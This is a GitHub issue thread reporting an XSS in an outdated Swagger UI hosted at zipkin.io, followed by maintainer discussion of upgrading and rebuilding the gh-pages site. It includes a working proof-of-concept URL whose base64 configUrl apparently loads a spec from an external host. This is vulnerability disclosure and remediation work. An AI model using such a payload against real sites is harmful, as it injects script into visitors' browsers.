Closed Iieitaimus closed 7 months ago
Up to update the swagger UI?
gh-pages branch https://github.com/openzipkin/zipkin-api/tree/gh-pages is where the UI is, so help wanted updating it! cc @SamTV12345 if you have time.
Note that I have no guarantee that this will actually solve the XSS, so probably want to read the docs and see if there's a config required also, and if that config already exists for the current version we expose on the website.
gh-pages branch https://github.com/openzipkin/zipkin-api/tree/gh-pages is where the UI is, so help wanted updating it! cc @SamTV12345 if you have time.
Note that I have no guarantee that this will actually solve the XSS, so probably want to read the docs and see if there's a config required also, and if that config already exists for the current version we expose on the website.
Could you please point me to how this API is built 😃 ? I found this library named Sway which hasn't received any update in 5 years.
sure.. here was my note on the last commit that did anything notable https://github.com/openzipkin/zipkin-api/commit/72928f0bfcbe2d50a3b7d3f9743065407e3ced06 (remember the PR has to be on the gh-pages branch)
so, unzip a release and see if it fixes the XSS.. there may be some drift on changes. Anything not obviously ours it doesn't touch on unzip probably needs to be deleted (things that were from an old version) https://github.com/swagger-api/swagger-ui/releases
@SamTV12345 so simply using the new version of swagger didn't remove the XSS. Using "killing this XSS" as a goal, let's look into your custom build (from master). For example, possibly we can just remove the form and hard-code the swagger, as well source it locally vs via an absolute href.
Wanna go for it?
To actually deploy the whole site to GH pages, edit/rename build-bin/idl_to_gh_pages
to build-bin/dist_to_gh_pages
and make sure the IDL ends up in the dist ;)
note, the current deployed swagger UI is not popping this up https://zipkin.io/zipkin-api/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
Describe the Bug
There is runing old Swagger-UI exposed at
https://zipkin.io/zipkin-api/
. Its possible to execute js.Steps to Reproduce
POC alert box:
https://zipkin.io/zipkin-api/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==